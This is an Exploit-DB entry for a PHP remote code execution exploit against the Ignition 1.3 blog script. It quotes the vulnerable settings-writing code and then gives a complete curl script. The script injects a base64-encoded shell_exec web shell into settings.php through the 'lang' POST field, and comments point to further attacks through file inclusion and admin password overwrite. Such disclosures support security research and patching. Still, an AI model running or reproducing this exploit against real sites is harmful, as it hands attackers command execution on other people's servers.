Ignition 1.3 - Remote Code Execution

EDB-ID:

15865

CVE:

N/A

EDB Verified:

Author:

cOndemned

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-12-30

Vulnerable App: 
<?php

/*

Ignition 1.3 Remote Code Execution Exploit
by cOndemned
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz


source of i-options.php

	1.	<?php
	2.	session_start();
	3.	if ($_POST['submit']) {
	4.	if ($FH = @fopen('data/settings.php', 'w')) {
	5.		@fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
	6.	$uri = "'.$_POST['uri'].'";
	7.	$suri = "'.$_POST['suri'].'";
	8.	$blogtitle = "'.$_POST['title'].'";
	9.	$description = "'.$_POST['description'].'";
	10.	$postid = "'.$_POST['id'].'";
	11.	$author = "'.$_POST['author'].'";
	12.	$skin = "'.$_POST['skin'].'";
	13.	$gravatar = "'.$_POST['gravatar'].'";
	14.	$twitter = "' . $_POST['twitter'] . '";
	15.	$identica = "' . $_POST['identica'] . '";
	16.	$book = "' . $_POST['book'] . '";
	17.	$game = "' . $_POST['game'] . '";
	18.	$language = "' . $_POST['lang'] . '";
	19.	
	20.	require_once("template.php");
	21.	require_once("lang/$language.php");');
	22.		#fclose($FH);
	23.	}

We can overwrite setting.php by simply sending specially crafted POST request, 
and put some evil code into one of the variables. After running my PoC line with
$language var will be:

	$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";

Where "en" is default language and without filling this field correctly admin 
will see error while trying to access blog index. 

other attacks scenarios:

	- attacker can use $_POST['language'] variable to exploit Local File 
	Inclusion (lines 18 and 21)

	- fill $_POST['pass'] with new password (md5 hashed) to overwrite admins
	password

	- etc...
*/


$target = 'http://localhost/ignition/';

$post = array
(
	'uri'		=> $target,
	'suri'		=> $target,
	'description'	=> 'Just another lame php blog script owned :<',
	'skin'		=> 'default',
	'lang'		=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
	'submit'	=> 1
);

$sock = curl_init();

curl_setopt_array
(
	$sock, 
	array
	(
		CURLOPT_URL 		=> "$target/i-options.php",
		CURLOPT_RETURNTRANSFER	=> true,
		CURLOPT_POST		=> true,
		CURLOPT_POSTFIELDS	=> http_build_query($post)
	)
);

curl_exec($sock);
curl_close($sock);

echo "Check: $target/data/settings.php?cmd=[system_command]";

?>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services